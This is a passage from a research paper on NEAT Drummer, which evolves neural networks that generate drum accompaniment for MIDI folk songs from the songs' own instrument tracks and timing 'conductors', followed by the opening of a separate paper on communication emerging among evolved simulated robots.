Susanna. A follow-on experiment explores the consequences of inputting both instrument channels and conductors for the folk song Oh! Dem Golden Slippers. The question is whether the conductors add a dimension of variation that is seamlessly combined with the structure of the original song in the resultant drum track. A complex conductor is then input by itself into a CPPN to isolate its effects and easily discern the functional relationship between the conductor and its outputs. 4.2 Comparisons The second set of experiments are designed to scrutinize the power of scaffolding via input from the original song by attempting to achieve comparable output drum tracks without providing the original song as input. The aim is to illustrate the contribution of such scaffolding by investigating how other approaches fare without it. To control specifically for the contribution of the scaffold, each such attempt is still a variant of NEAT. That way, differences in performance are attributable to representation and scaffolding. In this spirit, first, ten 30-generation attempts are made to interactively evolve accompanying drums to Johnny Cope with NEAT without the drum channels from the song input into the network. Instead, in the first five at- tempts, the network is recurrent and inputs only a bias. These attempts com- pare the capabilities of a recurrent network without any scaffolding to those of the scaffolded networks. In the last five attempts, the network is feedforward and provided only position-in-song as input. Typical best results are presented. Second, three target-based experiments form a more objective comparison. In these target-based runs, the aim is to reproduce a specific drum track that was previously evolved with NEAT Drummer (i.e. with the scaffold provided) as an accompaniment to Johnny Cope. This drum track is set as the target for the target-based experiments, which do not have access to the scaffold. Target-based runs rely on the same NEAT algorithm as NEAT Drummer; however, the computer performs selection instead of a human user. Selection is performed as in regular NEAT, wherein each individual in the population is assigned a fitness based on the sum-squared error between the target pattern and the attempted output: f = √∑t=l t=0 M 2 − ∑t=nt=0 (xt − yt) 2 lM 2 , (1) 14 where M is the maximum possible error at any tick t, l is the number of ticks, xt is the target note value at tick t, and yt is the output value of the network at tick t. Note that if there are multiple output tracks, this expression is applied to each and the fitness is the average. This fitness function is designed to approach 1.0 the better the output matches the target. The main question is how hard it will be for NEAT to evolve the very same rhythm that it evolved with the scaffold. Three alternative representations are tested in this way: • recurrent neural networks with only a bias input, • feedforward networks with only a position-in-song conductor input, and • feedforward networks with both a position-in-song conductor and a position- in-measure conductor input. In these target-based experiments, NEAT is run with typical successful parameter settings for regular non-interactive evolution (Stanley and Miikku- lainen, 2002, 2004). In particular, the population size was 100 and probability of adding a connection or node in NEAT was 3% and 5%, respectively. The mutation power, i.e. the maximum magnitude of weight change, was 0.1 and the probability of mutating an individual connection was 80%. The compatibil- ity coefficients for determining to which species individuals belong (Stanley and Miikkulainen, 2002) were c1 = 1.0, c2 = 1.0, and c3 = 0.4. The compatibility threshold Ct was adjusted dynamically in increments of 0.5 to maintain a stable equilibrium of eight species. If it turns out that any of these variants can evolve the target drum track, it will show that the scaffold is not necessary to provide a context. On the other hand, if none of the representation can evolve the target, it shows the critical contribution of the scaffold. In summary, experimental results are divided into two parts: First, the power of scaffolding is tested through interactive evolution; second, scaffolding is compared to several variants of NEAT Drummer without scaffolding. The next section details the results of evolving interactively with the scaffold. 5 Scaffolding Results While NEAT Drummer can theoretically input a drum channel from a MIDI file and thereby generate variations of the percussion, this section focuses on drum tracks generated from inputting non-percussion instruments, like guitars and bass. Thus the MIDI songs input in this section do not include drums in their original form. Results in this section are reported through figures that are designed to demonstrate the relationship between the CPPN inputs and outputs as the song progresses over time. In the figures that follow, the inputs are arranged in rows at the bottom of each depiction and the outputs are the rows above. Time 15 moves from left to right and each discrete column represents a tick of the clock. No instrument can play at a rate faster than the clock ticks. There are four ticks per beat in all songs tested. A slightly thicker dividing line between columns denotes a measure break. While all drum tracks include bass, snare, and hi-hat outputs, the number and types of drum outputs is unlimited in principle as long as the right sounds are available. Recall that inputs are spikes; in the figures, their decays are depicted as decreasing darkness. In contrast, outputs represent volumes, wherein darker shading indicates higher volume. The main difference between inputs and out- puts is that a single note in the input may straddle several columns during its decay. Outputs on the other hand are played as separate notes for every solid column. For an output drum to last for more than a single tick before the next drum attack, it must be followed by white (empty) columns. 5.1 Inputting Instrument Channels Alone Figure 5 shows individuals from generations one and 11 generated for the folk song Johnny Cope. The relationship between the the bass, hi-hat, and snare and the three input channels is complex because each drum is related to all three inputs. Note however that the instrumental patterns in measures three and four are highly related though not identical. Slight differences exist between the piano pattern in measure three and measure four; this difference is reflected in the snare in both generations one and 11, which both slightly differ between the early parts of measures three and four. Thus, the drum pattern’s subtle variation is correlated to the music because of their coupling, which evokes a subjective sense of appropriate style. At measure 23, the song changes sharply by eliminating the piano part. Consequently, the CPPN outputs also diverge from their previous consistent motifs. This strongly coupled divergence that is carried both in the tune and in the drums creates a sense of purposeful coordination, again yielding a natural, sophisticated feel. In this way, the functional relationship represented by the CPPN causes the drums to follow the contours of the music seamlessly. Generation 11, which evolved 12 additional connections and six additional nodes, reacts particularly strongly to the elimination of the piano by significantly altering its overall pattern. In generation one, the shift is less dramatic, showing how the user interactively pushed evolution towards a sharper transition over those ten generations. Generation 11 also elaborates on the snare, making it harder-hitting in the later measures than in earlier ones. Results from generation 25 of Oh! Susanna are shown in figure 6. NEAT Drummer produces similarly natural and style-appropriate rhythms for this song as well, suggesting its generality. Because style is inherent in the original song’s channels, it transfers seamlessly to the drum track without any need for explicit stylistic rules. The result is an entertaining sound that could be attached to the original instrumental tracks without raising suspicion. It is interesting to listen to the songs with their generated drum tracks, which makes it possible to judge their subjective quality (a critical aspect of 16 Figure 5: Johnny Cope Results. Results are depicted from two different generations at two different parts of the song. The inputs from the original song, which are always the same, are shown at bottom. Note the relationship between the inputs and the outputs, and between the first generation and the eleventh, which elaborates on the former. The motif in measures three and four is typical of the first part of the song until measure 23, when it switches to a different motif in both generations. Thus, the figure gives a sense of the two predominant drum riffs exhibited in both generations. The main conclusion is that the output is a function of the input that inherits its underlying style and character. (These tracks are available at http://eplex.cs.ucf.edu/neatmusic/) 17 Figure 6: Oh! Susanna Outputs. This pattern from measures three through six of Oh! Susanna is from generation 25 of evolution. The network evolved 15 hidden nodes and 41 connections. Near the end of measure four is a particu- larly improvisational riff in the snare that transitions to measure five. This riff is caused by variation in the piano and other inputs at the same time. As with Johnny Cope, the drum pattern sounds natural and styled correctly for this up- beat song. (This track is available at http://eplex.cs.ucf.edu/neatmusic/) musical appreciation). In the authors’ experience (which the reader can also judge), the generated tracks sound natural and lack the usual “mechanical” quality of computer-generated music. Rather than repeating stock patterns, core motifs subtly vary and are interspersed with occasional unique flourishes. The personality of these variations is a byproduct of the personality that is implicit in the song itself, simply functionally transformed into a different local motif. This result further demonstrates that it is possible to inherit the natural character of one pattern by deriving another from it. Of course, the evolved song also in part reflects the tastes of the human user. 5.2 Inputting Instrument Channels and Conductors Figure 7 highlights the effect of a conductor input on drum tracks produced for the song Oh! Dem Golden Slippers, which has a very similar beginning and end; all the measures in these parts are similar. Thus the question is whether a conductor can introduce a sense of progression into the drums even though the song itself undergoes little discernable progression between the start and finish. Figure 7(a) shows example drum output for this song without any additional conductor. Thus, with only the song’s channels as inputs, the resultant drum pattern is also highly repetitive; the pattern in measures two and three is largely preserved much later in measures 38 and 39 (figure 7a). Yet when a position-in- song conductor (figure 4a) is added as an input, the difference in drum patterns between measures two and three and measures 38 and 39 is dramatic, show- ing the powerful effect of the simple conductor (figure 7b). Nevertheless, even 18 (a) Without Conductor (b) With Position-in-song Conductor (c) With Position-in-song and Position-in-measure Conductors Figure 7: Oh! Dem Golden Slippers with and without Conductors Output drum patterns are shown for the song in one case when no conductor is input (a) and in the other where a position-in-song conductor is input (b, shown at bottom). The difference in resultant drum patterns shows that the conductor imposes a temporal progression on the drum track that does not derive from the structure of the song itself, demonstrating the power of conductors to subtly shape the structure of music. Finally, when conductors indicating both position- in-song and position-in-measure are input simultaneously (c), progression is enhanced both throughout the song and within each measure. (These tracks is available at http://eplex.cs.ucf.edu/neatmusic/) 19 Figure 8: Complex Conductor. The conductor, which follows the pattern quarter quarter half, is shown at bottom. Two three-part drum tracks that are functions this conductor are shown above it. While both drum tracks are dif- ferent, they are also both constrained by the underlying motif of the conductor. (These tracks are available at http://eplex.cs.ucf.edu/neatmusic/) though the drum pattern exhibits a sharply different motif at these two similar parts of the song, it sounds appropriate and sophisticated in both parts because it is a function of both the conductor and the instrument channels. Thus it is a seamless variation on both influences simultaneously. It is also possible to combine multiple conductors to affect the structure of the output in more than one way. Figure 7(c) shows the impact of inputting both the time in the song (figure 4a) and the time in the measure (figure 4b) together. The result is that not only do the later drum patterns differ from the earlier ones, but the interior of each measure varies in part independently of the instrumental scaffold. This effect is subtle because there are five instrumental tracks already influencing the pattern in each measure. However, closely comparing the drum measure patterns in 7(c) to 7(a) and 7(b) does reveal a discernable difference. Finally, figure 8 isolates the effect of a single complex conductor. The aim is to show explicitly how the output of the CPPN is influenced by the incoming conductor, which expresses the same quarter quarter half pattern as in figure 3. Thus, the outputs of two CPPNs that both take the same conductor are displayed for comparison. The main result is that the patterns of the two three- part tracks are both closely tied to the pattern of the conductor, wherein two short events are always followed by a long one. Yet, within that framework, the patterns nevertheless differ significantly, illustrating the idea that a conductor is an implicit guide above which the pattern is realized, even if there is no explicit song at all. The next section exhibits the evolved CPPNs that produce the drum tracks in this section. 20 5.3 Evolved CPPNs Figure 9 shows the CPPNs that were evolved for each of the evolved drum tracks in Sections 5.1 and 5.2. These networks range in complexity from 1 to 15 hidden nodes. Interestingly, the subjective quality of the accompaniment does not seem to correlate to the complexity of the network. This perception makes sense because the functional relationship to the original instrument channels guarantees a tight coordination between drums and instruments. Thus creating a plausible coordination does not require significant complexity. Furthermore, if the underlying instrument channels themselves embody complex motifs and progressions, then the drums inherit the same complexity even if the CPPN that relates them is not itself complex. What CPPN complexity affords, rather, is a more complex relationship that is realized through more elaborate covariation. This subjective effect is subtle yet perceptible, suggesting that more sophisticated compositions may suggest to the human ear the complexity of the function relating their parts. Yet the most important conclusion is that complexity is not essential to the CPPN that relates one part to another because the complexity need only exist originally in the preexisting parts. To a large extent, that original complexity is transferred through the CPPN to any affiliated drum pattern. The next section presents the results from the comparative experiments. 6 Comparison Results While the results in Section 5 establish the quality of the tracks produced through scaffolding and the power of conductors to shape the output pattern, the question remains what is lost if the scaffold is not provided, as in prior au- tomated music generation techniques. Can similar accompaniment be produced without a scaffold? This section validates the role of the scaffold by answering this question. Typical results reported in this section can be heard at http://eplex.cs.ucf.edu/neatmusic/. 6.1 Interactive Evolution Without Scaffolding As described in Section 4.2, in the first set of comparisons, recurrent ANNs with only a bias input and feedforward ANNs with position-in-song as input were evolved interactively with no other inputs to accompany Johnny Cope. Five 30-generation runs of both configurations were completed. Figure 10 shows typical best results from these runs. The best results from each set reveal a distinct difference between feedforward functions of position-in- song and evolved recurrent networks. The feedforward patterns never develop beyond monotonous unbroken gradients that gradually vary from loud to soft, and sometimes back again (figure 10a). These gradients often span the length of the song, or a large extent of it, and do not respect the measure structure. Thus, overall, position-in-song alone is not enough to allow interactive evolution to 21 (a) Johnny Cope Gen. 1 (b) Johnny Cope Gen. 11 (c) Oh! Susanna (d) Oh! Dem Golden without Conductors (e) Oh! Dem Golden with the Time Conduc- tor (f) Oh! Dem Golden with Measure and Time (g) Quarter Quarter Half Conductor (h) Quarter Quarter Half Conductor Figure 9: CPPN Drum Track Generators. The evolved CPPNs that pro- duce every drum track shown in Sections 5.1 and 5.2 are depicted. While the complexities vary, the quality of the output is similar because each produces a function of a preexisting song, thereby inheriting its qualities. Activation func- tions are denoted by S for sigmoid, M for multiplication, G for Gaussian, and L for linear. 22 (a) Typical Best Feedforward (b) Typical Best Recurrent Figure 10: Typical Best Results from Interactive Evolution Without Scaffolding. Best results from both types of representations tested are de- picted. The feedforward network only inputs position-in-song and produces unremarkable gradient patterns that do not follow the structure of music nor the Johnny Cope song. The recurrent network produces repeating motifs, but they are not synchronized with the measure and they do not vary with the song. In this way, removing the scaffold removes a major advantage of NEAT Drummer. compete with evolving networks with a better scaffold. This result makes sense because the only input is the position in the song, so the only way to develop a significant number of changes is to add many hidden nodes, which would take far longer than 30 generations. Also, because CPPNs have no knowledge of when measures begin or end, the changes that do occur are difficult to evolve to align with the measure structure. In contrast, patterns interactively evolved with recurrent networks do display more complexity and more frequent changes over time (figure 10b). Because feedback can lead to complex oscillations without the need for many hidden nodes, recurrent networks are better suited to producing complex variation early in evolution. However, the drum patterns are difficult to evolve to align with the contours of the music itself because the recurrent network is unaware of the music without the scaffold. Furthermore, these networks suffer from the same problem with measure structure as the feedforward networks: Even though 23 some motifs repeat, they repeat at haphazard times relative to each measure, producing a disorganized aesthetic. For example, the bass drum in figure 10(b) is hit several times at the start of the first measure, but by the fourth measure, this motif has moved to the middle of the measure. The overall result is that while the recurrent networks produce more com- plexity, the patterns evolved by both networks are not synchronized with Johnny Cope and therefore sound disjointed, highlighting the critical role of the scaffold in tethering the accompaniment to the song itself. 6.2 Targeted Evolution Without Scaffolding In this experiment, the same two types of networks as in the previous section, i.e. one recurrent and one feedforward with position-in-song input, were evolved to match a target (figure 11c), which is a rhythm for Johnny Cope output by NEAT Drummer with the scaffold in the 11th generation. Clearly, the scaffold provides an advantage, but the question addressed by this experiment is how hard it is without the scaffold to approximate the same output even when the precise target rhythm is known a priori. Because it is also known that the target rhythm took exactly 11 generations to evolve when the scaffold was provided, the number of generations it takes these variant networks to produce the same output can be compared. Each variant attempted to match the target in 20 separate runs. Figure 11 shows typical best results from these runs after 1, 600 NEAT gen- erations with a population size of 100. It turns out that the feedforward network suffered similar problems breaking away from simple gradients as in interactive evolution. While such a network theoretically could approximate the target pat- tern, it always became trapped on a local optimum because it is easy to reach a fairly high fitness simply by approximating the general loudness of drums over large contiguous periods of time. In other words, instead of attempting to dis- cover every individual beat, it discovers their average energy and paints that energy level across large swaths of time. Thus this type of network is demon- strably ill-suited to producing such temporal patterns, either through interactive evolution or target-based evolution. However, interestingly, unlike in the 30-generation interactive experiment, after 1600 generations the recurrent network typically produces a repeating pattern that does synchronize with the measure structure. Thus one conclusion is that recurrent networks can learn musical structure given sufficient time. However, unlike the target pattern, which displays distinct variations (e.g. in the latter half of figure 11c), the pattern produced by the best recurrent networks tend to repeat the same measure pattern throughout the song after the first generation (figure 11b). Also, this repeating motif is only vaguely reminiscent of the target, which is likely because the recurrent network has trouble producing the subtle repetition with variation that the target inherited from its scaffold when it was evolved. Because the feedforward results were disappointing, a third set of 20 runs was attempted with a feedforward network that receives both position-in-song 24 (a) Typical Feedforward Champion (b) Typical Recurrent Champion (c) Target Pattern Figure 11: Typical Best Results from Target-based Evolution Without Scaffolding. Feedforward (a) and recurrent (b) results are depicted and the target pattern is shown in (c). The aim was to match the target. As this figure shows, neither variant successfully matched the target (which was evolved in NEAT Drummer in 11 generations) after 1,600 generations, although the recurrent variant evolved more complex patterns. This result confirms again the importance of the scaffold. 25 Figure 12: Typical Result from Target-based Evolution with Position- in-song and Position-in-measure Inputs. The improvement in pattern complexity, and the adherence to measure structure, are apparent in comparison to figure 11a. By providing position-in-measure as input, evolution can easily produce patterns that follow the timing of measures, demonstrating the power of conductor inputs. However, without the scaffolding inputs from Johnny Cope, the drum pattern still does not match the target despite its regular structure. and position-in-measure conductors as input. The idea is to relieve the network of the need to discover the measure structure of music on its own, exploiting the power of conductors. In fact, as figure 12 shows, providing position-in- measure typically dramatically improves the complexity of the output and allows it to break out of the local optima that trap such networks without position-in- measure. Indeed, the feedforward output resembles the output of the recurrent network and respects measure structure, demonstrating the contribution of the additional conductor. Yet because even such conductors do not contain the same song-specific information as the scaffold, like the recurrent network, the output pattern is only marginally reminiscent of the actual target pattern, and is also more repetitive. Thus, after 1,600 generations, none of the variant networks are able to suc- cessfully match a target pattern that was discovered in only 11 generations. Fig- ure 13 summarizes this result by depicting fitness over time in the three variants, each averaged over 20 runs. Whereas a fitness of 1.0 denotes a perfect match, none of the variants reach a fitness of even 0.7. Interestingly, despite the appar- ent aesthetic inferiority of the feedforward network with only position-in-song, on average its fitness approaches that of the other two variants, demonstrating why local optima characterized by smooth volume gradients attract it. Although their final fitness levels are not far apart, the differences between some of the variants are significant. In particular, recurrent networks pro- duce significantly higher fitness than position-in-song alone throughout the run (p < 0.05), and feedforward with the position-in-measure input outperforms feedforward without it (p < 0.05). However, interestingly, by the end of each run, recurrent networks on average are not significantly better than feedfor- 26 Figure 13: Fitness Over Time of the Three Variants in Target-based Evolution. The increase in fitness over 1,600 generations of evolving the three variant representations is shown, averaged over 20 runs for each. A perfect fitness of 1.0 would mean the target is matched perfectly. None of the variants exceed 0.7 fitness because the search is too unconstrained without the scaffold. ward with position-in-measure, showing that feedforward networks can match the performance of recurrent networks on this task when provided information on the structure of music. However, most significantly, none of the variants can produce a pattern close to the target within 1,600 generations. The main conclusion from both interactive and target-based comparisons is thus that the scaffold provides critical infrastructure. In effect, it constrains the search to patterns that relate to the original song. If accompaniment is to be evolved for an existing song, inputs from that song should be provided as a scaffold. Without such context, the accompaniment becomes decoupled from the song regardless of the representation. A further result is that conductors make it easier to discover patterns that respect musical structure. While the recurrent network does eventually discover a measure-synchronized motif in the target-based runs, it takes hundreds of gen- erations to achieve such synchrony. On the other hand, when time-in-measure is provided as a conductor, measure structure is respected from the start. Overall, this set of experiments confirms the contribution of the scaffold and suggests that it should be a standard facet of any network-based attempt to generate musical accompaniment. 7 Discussion While the sheer size of a composition containing multiple interrelated tracks suggests its complexity, the results with NEAT Drummer show that by encoding some parts as functions of others, much of the apparent complexity is removed. While each drum track contains hundreds of drum strikes over several minutes, 27 the networks that represent them contain on average only 22 connections. The most salient feature of drum tracks generated in this way is that they sound natural, hinting that the functional relationship may reflect a realistic aspect of human musical creativity. 7.1 Implications of Scaffolding The idea of scaffolding, i.e. deriving several parts from a preexisting pattern, means that the most profound effort in musical creativity can be largely con- centrated on a relatively small part of the overall composition, which can then provide a scaffold for other parts. The interrelationships among the different in- struments of a song can be expressed as functions of one or more scaffold tracks, which is the approach taken in this paper. While effective, it is interesting that the direction of the relationship could also go the other way: Melody and har- mony can by expressed as a function of rhythm. In fact, harmony can also be a function of melody and vice versa. Thus there is no apparent essential starting point, though some may be more natural than others depending on the context. Nevertheless, it is clear that something must form the scaffold from which all other accompaniment is derived. Thus, as long as some seed is introduced, the accompaniment can follow smoothly. The main contribution of this paper is thus to advance automated music gen- eration by introducing an effective method for representing some parts of a song with respect to others in a connectionist framework. This approach significantly simplifies the problem of constraining accompaniment appropriately. Neverthe- less, of course, different styles of accompaniment may be more or less difficult to discover, even with the scaffold. For example, can convincing jazz walking bass be generated even in the context of other jazz instrumental tracks? Cer- tainly it is possible that the interactive evolution process can discover a function that expresses a particular style, yet the likelihood of such a discovery depends on to what extent the style is already embodied by the existing scaffold. The extent to which the scaffold contains essential stylistic cues, combined with the complexity of the function that would create the right style in the absence of such cues, determines the difficulty of the discovery. Thus this work does not diminish the considerable human effort required to acquire specialized styles of accompaniment. Another intriguing possibility is that specific conductors can be developed that constrain output to a desired style. Thus, while discovering a style based on the scaffold alone may be difficult in some cases, providing both the scaffold and carefully chosen conductors can potentially simplify the search, just as conductors in this paper convey a priori measure and beat structure. Interestingly, once a CPPN is found that yields a particular accompaniment style, it can potentially be reused with other tracks. Thus, once discovered, stylistic accompaniment may be transferable, which is an important topic for future research. Overall, then, while some styles of accompaniment are probably harder to discover than others, the scaffold reduces the space that must be searched. 28 Nevertheless, although automated music generation may benefit from this principle, it still does not solve the fundamental problem of generating the scaffold itself. What kind of process can create the initial pattern? Interestingly, it is possible that even an individual instrumental part can be generated from an even more abstract underlying scaffold, i.e. one that is never actually heard, like the conductors in this paper. These abstract patterns represent musical structures below the level of the explicit notes and pauses. Rather, they are the shape of the fabric upon which such notes are woven. An interesting hypothesis is that human composers and songwriters construct at a cognitive level such hidden “conductors” before the salient musical pattern emerges as notes and rhythms. It may be difficult to discern, but several simple underlying functional motifs that cannot be expressed in musical notation may underlie apparently richly textured musical masterpieces. Perhaps this hidden factor plays a role in our appreciation of music; when the many threads of a symphony stand out in their synchronized majesty, perhaps the brain is appreciating the simple hidden scaffold that unifies them in purpose. Another complementary possibility is that even a long serial progression of notes is actually a series of motifs that are functions of each other. This view suggests that a scaffold or conductor underlying a long melody may itself be short and compact. These considerations lead to the philosophical question of how little is necessary to encode a “human essence” that functionally-related parts can inherit. Perhaps only a very simple and short hidden function is all that is essential to the subsequent unfolding of a symphony. The size of the smallest necessary seed is practically important because the smaller it is, the easier it will be in the future to create entire compositions automatically. For example, if an entire complicated melody can be generated from a simple initial function, and the rhythm and harmony can be generated from the melody, then a future system might require a human to merely suggest the barest motif, such as a gradual attack followed by several step-wise decays, and from that point elaborate an entire composition through scaffolding. Another important ingredient of NEAT Drummer that is not automated is the user’s input. The product of a NEAT Drummer session thus in part reflects the creativity of the user, and not just the search algorithm. It is an interesting question whether the user can be entirely eliminated, allowing the computer to compose completely on its own. However, while NEAT Drummer does not eliminate the need for human input, what it does eliminate is the need for human expertise by shifting the creative focus from composition to opinion (i.e. what sounds the best). In this way, a significant obstacle to widespread, high-quality musical creativity is removed. Thus the promise of this work is that it opens a promising new avenue to computer-generated music that raises interesting questions about how music is encoded and generated by humans. 29 7.2 The Role of Recurrence in Connectionist Music The experiments comparing recurrent networks to scaffolded CPPNs in Sec- tion 6 yield interesting insight into the capabilities and limitations of recurrent neural networks applied to generating musical accompaniment. In particular, recurrent ANNs do produce complex motifs, but it is difficult to synchronize them to musical structure. While a CPPN with a position-in-measure conduc- tor can right away produce patterns that respect measures, it takes hundreds of generations to achieve the same with recurrent networks, which is too long for a human performing interactive evolution. This result raises the question of whether it is biologically realistic in connec- tionist models of music generation to rely upon recurrence as the main mecha- nism of musical encoding. It is also plausible that the brain stores music in part as simple functions that are layered and composed one upon another. It is no- table that evolving a recurrent network (figure 11b) and a feedforward network that is a function of both position-in-song and position-in-measure (figure 12) produced results of similar quality. Thus the question remains open whether the best infrastructure for generating temporal patterns is recurrence, or whether it is two simple timing signals upon which feedforward functions can be built. It may also be a combination of the two. 8 Conclusion This paper argued that the reason human musicians can improvise and com- pose vast and complex accompaniments almost instantaneously is that they are in effect generating a simple function that relates one instrument’s part to an- other’s. This idea was implemented in a program called NEAT Drummer that generates novel drum tracks for existing MIDI songs. Furthermore, the idea of a conductor, i.e. a simple hidden function that affects the overall pattern of music, was introduced. The results demonstrated the viability of this model of musical creativity, producing drum tracks that tightly follow the contours of real songs yet still produce nontrivial accompaniment. The conductors seamlessly introduced variational motifs over and above those already in the existing song structure, creating a new way for humans with little musical expertise to control the overall structure of a song. The main conclusion is that a significant portion of musical creativity may be explained by the functional relationships between the different parts of a song. Acknowledgments Special thanks to Michael Rosario for his prior work at the University of Central Florida creating the software infrastructure for NEAT Drummer. Special thanks also to Barry Taylor for granting special permission to utilize his own MIDI productions of folk music in this work. Barry Taylor originally sequenced Johnny Cope, Oh! Susanna, and Oh! Dem Golden Slippers (all without percussion), 30 which are the three songs for which drum tracks were generated in Sections 5 and 6. This research was supported in part by NSF grants IIS-REU: 0647120 and IIS-REU 0647018. References Barrett, F. J. (1998). Coda: Creativity and improvisation in jazz and orga- nizations: Implications for organizational learning. Organization Science, 9(5):605–622. Special Issue: Jazz Improvisation and Organizing. Berliner, P. F. (1994). Thinking in Jazz: The Infinite Art of Improvisation. (CSE) Chicago Studies in Ethnomusicology. The University of Chicago Press, Chicago. Biles, J. A. (1999). Life with genjam: interacting with a musical iga, systems, man, and cybernetics. In IEEE International Conference on Systems, Man, and Cybernetics, pages 652–656. Biles, J. A. (2007). Evolutionary computation for musical tasks. In Miranda, E. R. and Biles, J. A., editors, Evolutionary Computer Music, chapter 2, pages 28–51. Springer-Verlag New York, Inc., Secaucus, NJ, USA. Chen, C.-C. and Miikkulainen, R. (2001). Creating melodies with evolving recurrent neural networks. In Proceedings of the INNS-IEEE International Joint Conference on Neural Networks, pages 2241–2246. Dawkins, R. (1986). The Blind Watchmaker. Longman, Essex, U.K. de Mantaras, R. L. and Arcos, J. L. (2002). Ai and music from composition to expressive performance. AI Mag., 23(3):43–57. Deutsch, O. E. (1965). Mozart: A Documentary Biography. Standford Univer- sity Press, Standford, California. 59. Dolson, M. (1989). Machine tongues xii: Neural networks. Computer Music Journal, 13(3):28–40. Furuta, H., Maeda, K., and E.Watanabe (1995). Application of genetic algo- rithm to aesthetic design of bridge structures. Microcomput. Civil Eng, 10(6):415–421. Gomez, F. and Miikkulainen, R. (1999). Solving non-Markovian control tasks with neuroevolution. In IJCAI-99, pages 1356–1361, KAUF-ADDR. KAUF. Husbands, P., Copley, P., Eldridge, A., and Mandelis, J. (2007). An introduction to evolutionary computing for musicians. In Miranda, E. R. and Biles, J. A., editors, Evolutionary Computer Music, chapter 1, pages 1–27. Springer- Verlag New York, Inc., Secaucus, NJ, USA. 31 Hymer, S. (1990). On inspiration. In Stern, E. M., editor, Psychotherapy and the Widowed Patient. The Haworth Press, Inc., New Rochelle, New York. Johanson, B. and Poli, R. (1998). Gp-music: An interactive genetic program- ming system for music generation with automated fitness raters. In Pro- ceedings of the Third Annual Conference: Genetic Programming, pages 181–186. Katz, P. and Longden, S. (1983). The jam session: A study of spontaneous group process. In Middleman, R., editor, Activities and Action in Groupwork, chapter 3, pages 37–52. The Haworth Press, Inc, Binghamton, NY. Kuriyama, K. and Terano, T. (1997). Interactive story composition support by genetic algorithms. In World Conf. Artificial Intelligence in Education, page 615617, Kobe, Japan. Lindenmayer, A. (1968). Mathematical models for cellular interaction in de- velopment parts I and II. Journal of Theoretical Biology, 18:280–299 and 300–315. McCormack, J. (2005). Open problems in evolutionary music and art. In Pro- ceedings of Applications of Evolutionary Computing, (EvoMUSART 2005), volume 3449 of Lecture Notes in Computer Science, pages 428–436, Berlin, Germany. Springer Verlag. Nelson, G. L. (1993). Sonomorphs: An application of genetic algorithms to growth and development of musical organisms. In 4th Biennial Art and Technology Symp., pages 155–169. Oliver, M. (2006). On inspiration. Contemporary Music Review, 25(5/6):457 – 459. Onisawa, T., Takizawa, W., and Unehara, M. (2000). Composition of melody reflecting users feeling. IEEE Int. Conf. Industrial Electronics, Control and Instrumentation, page 27382743. Ruppel, R. R. (1998). Gottfried Keller and His Critics: A Case Study in Schol- arly Criticism. Camden House, Columbia, SC. Saravanan, N. and Fogel, D. B. (1995). Evolving neural control systems. IEEE Expert, pages 23–27. Sato, T. and Hagiwara, M. (1999). Tool creating support system using evolution- ary techniques. Faji Shisutemu Shinpojiumu Koen Ronbunshu, 15:363366. Schuller, G. (1968). Early Jazz. Oxford University Pres, New York. Secretan, J., Beato, N., D’Ambrosio, D. B., Rodriguez, A., Campbell, A., and Stanley, K. O. (2008). Picbreeder: Evolving pictures collaboratively online. In CHI ’08: Proceeding of the twenty-sixth annual SIGCHI conference on Human factors in computing systems, pages 1759–1768, New York, NY, USA. ACM. 32 Sims, K. (1991). Artificial evolution for computer graphics. In Proceedings of the 18th Annual Conference on Computer Graphics and Interactive Techniques (SIGGRAPH ’91), pages 319–328, New York, NY. ACM Press. Stanley, K. O. (2006). Exploiting regularity without development. In Proceed- ings of the AAAI Fall Symposium on Developmental Systems, Menlo Park, CA. AAAI Press. Stanley, K. O. (2007). Compositional pattern producing networks: A novel abstraction of development. Genetic Programming and Evolvable Machines Special Issue on Developmental Systems, 8(2):131–162. Stanley, K. O. and Miikkulainen, R. (2002). Evolving neural networks through augmenting topologies. Evolutionary Computation, 10:99–127. Stanley, K. O. and Miikkulainen, R. (2004). Competitive coevolution through evolutionary complexification. JAIR, 21:63–100. Takagi, H. (2001). Interactive evolutionary computation: Fusion of the capac- ities of EC optimization and human evaluation. Proceedings of the IEEE, 89(9):1275–1296. Todd, P. M. and Loy, D. G. (1991). Music and Connectionism. MIT Press, Cambridge, MA. Todd, S. and Latham, W. (1992). Evolutionary Art and Computers. Academic Press, London. Todd, S. and Latham, W. (1999). The Mutation and Growth of Art by Comput- ers, chapter 9, pages 221–250. Morgan Kaufmann, San Mateo, California. Tokui, N. and Iba, H. (2000). Music composition with interactive evolutionary computation. In Third International Conference on Generative Art, pages 215–226, Milan Italy. Weick, K. E. (1998). Introductory essay: Improvisation as a mindset for organi- zational analysis. Organization Science, 9(5):543–555. Special Issue: Jazz Improvisation and Organizing. Yao, X. (1999). Evolving artificial neural networks. Proceedings of the IEEE, 87(9):1423–1447. 33 work_ojlv3fg34jcrnmyawv4ljovkci ---- ws-procs9x6 Emergence of Communication in Embodied Agents Evolved for the Ability to Solve a Collective Navigation Problem Davide Marocco Stefano Nolfi Institute of Cognitive Science and Technologies, CNR, Viale Marx 15 Rome, 00137, Italy [davide.marocco; stefano.nolfi]@istc.cnr.it In this paper we present the results of an experiment in which a collection of simulated robots that are evolved for the ability to solve a collective navigation problem develop a communication system that allows them to better cooperate. The analysis of the obtained results indicates how evolving robots develop a non-trivial communication system and exploit different communication modalities. Results also indicate how the possibility to co-adapt the robots’ individual and social/communicative behaviour plays a key role in the development of progressively more complex and effective individuals. 1. Introduction The development of embodied agents able to interact autonomously with the physical world and to communicate on the basis of a self-organizing communication system is a new exciting field of research (Steels and Vogt, 1997; Cangelosi and Parisi, 1998; Steels, 1999; Steels and Kaplan, 2001; Marocco, Cangelosi and Nolfi, 2003; Quinn et al, 2003; for a review see Kirby, 2002; Steels, 2003; Wagner et al., 2003; Nolfi, 2005). The objective is to identify methods of how a population of agents equipped with a sensory-motor system and a cognitive apparatus can develop a grounded communication system and use their communication abilities to solve a given problem. Answering this question is important for both scientific and technological reasons. From a scientific point of view, understanding how communication abilities and a communication system might emerge in a population of interacting embodied agents might shed lights on the evolution of animal communication and on the origin of language. From a technological point of view, understanding the fundamental principles involved might lead to the development of innovative communication methods for multi-agent software systems, autonomous robots, and ubiquitous computing devices. In this paper we present the results of an experiment in which a collection of simulated robots that are evolved for the ability to solve a collective navigation problem develop a communication system that allows them to cooperate better. Robots are provided with simple sensory-motor systems that allow them to move, produce signals with varying frequencies, and gather information from their physical and social environment (including signals produced by other agents). Since the chosen problem admits a variety of qualitatively different solutions and since robots are selected on the basis of their ability to solve the collective navigation problem (and not on the basis of their communication abilities), evolving robots are left free to determine the circumstances in which communication is used, the structure of the 